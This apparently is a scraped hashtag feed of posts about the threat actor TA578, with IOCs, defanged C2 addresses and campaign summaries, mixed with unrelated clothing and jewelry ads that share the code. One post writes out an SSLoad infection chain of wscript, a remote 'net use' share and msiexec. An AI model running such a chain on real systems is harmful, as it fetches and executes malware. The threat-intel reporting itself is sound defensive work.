Basically, TA578 was generating the .LNKs from a file named 1.bat in the 'test link' folder on the lamar desktop 👀

You can see the matches (metadata) here:
248322abe291aa979c34ee5f9bd76e70→IcedID
e1529e1c4bdcf9f34af8faa73f756422→Bumble
Same MAC and NetBIOS name too.

TA578~Charlize blus~2warna~spandek~60rb~good quality fit to L besar (no seri)

20 Pcs Tibetan Silver Jewelry Finding Crafts cross Charms Pendants TA578 buycrafts44.info/US/landing-sta…

Inspired by #TA578 and for further research, I've created my own 'malicious' .LNK file generator (without metadata), now it's time to test the capacities of this thing 🤓

2022-06-28 (Tuesday) - #TA578 thread-hijacked email pushed #IcedID ( #Bokbot ) - Led to #DarkVNC on 91.238.50[.]80:8080, then #CobaltStrike on 217.79.243[.]147:8080 using bcnupdate[.]com and on 194.37.97[.]139:8080 using solvesalesoft[.]com - IOCs at: bit.ly/3u5fcRi

2022-06-14 (Tuesday) - #TA578 #Bumblebee malware infection led to #CobaltStrike activity on 172.93.181[.]105:443 using hocavopeh[.]com - IOCs available at:
bit.ly/3HoonBO

2022-07-06 (Wed) - #TA578 #ContactForms campaign used Yandex URL to deliver zip-ed ISO - Led to #IcedID ( #Bokbot ), which led to #DarkVNC on 188.40.246[.]37:8080 & #CobaltStrike on 198.44.132[.]80:8080 using centertechengineering[.]com - IoCs available at: bit.ly/3nK8FYB

#SSLoad - #TA578 - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

This new #malware campaign uses actual conversation threads taken from the sender and receiver's emails to trick either of them into opening a malicious file.

#Phishing #Cybersecurity #TA578
ow.ly/Z6N650JRLXU

ISC Diary: Brad reviews #TA578 using thread-hijacked emails -> .iso files for #Bumblebee i5c.us/d28636

Bumblebeeも返信型でパスワードzipに対応

TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
isc.sans.edu/diary/28636

Quick Malware Analysis: TA578 Thread-hijacked email, Bumblebee, and Cobalt Strike pcap from 2022-06-14 dlvr.it/STNRT0 #cyber #threathunting #infosec

Today's quick #malware analysis with #SecurityOnion : #TA578 , #Bumblebee , and #CobaltStrike pcap from 2022-06-14!

Thanks to Brad for sharing this #pcap !

More screenshots:
blog.securityonion.net/2022/06/quick-…

#DFIR
#infosec
#infosec urity
#ThreatHunting
#IncidentResponse

#ln -s :malware_traffic: RT Unit 42: 2022-07-06 (Wed) - #TA578 #ContactForms campaign used Yandex URL to deliver zip-ed ISO - Led to #IcedID ( #Bokbot ), which led to #DarkVNC on 188.40.246[.]37:8080 & #CobaltStrike on 198.44.132[.]80:8080 using cent…

Here are some #ssload #ta578 IOCs from today:
github.com/executemalware…

Thread hijacking operation linked to TA578. Gun owner data leaked by California Justice Department.

darik.news/california/the… #DataLeak #hijacking

Today's quick #malware analysis with #SecurityOnion : #TA578 #ContactForms #IcedID #CobaltStrike #pcap from 2022-05-10!

Thanks to Brad for sharing this #pcap !

More screenshots:
blog.securityonion.net/2022/05/quick-…

#DFIR
#infosec
#infosec urity
#ThreatHunting
#IncidentResponse

via @JKafria_Shop: TA578 • Blouse Charlize • Spandex • Fit to L • 52.000 #JKupdate @FreeIklanID pic.twitter.com/WBzc28h24a

Today's quick #malware analysis with #SecurityOnion : #TA578 Contact Forms Campaign #Bumblebee Infection with #CobaltStrike pcap from 2022-06-09!

Thanks to Brad for the #pcap !

More info:
blog.securityonion.net/2022/06/quick-…

#infosec
#infosec urity
#ThreatHunting
#IncidentResponse

3/ La primera etapa simula ser un sitio de Google Docs para realizar la descarga vía HTML5 y FileSaver.js (al estilo #TA578 ).

Todo esto a través de la explotación dinámica de Cross-Site Scripting (XSS) en múltiples sitios de terceros (evasión).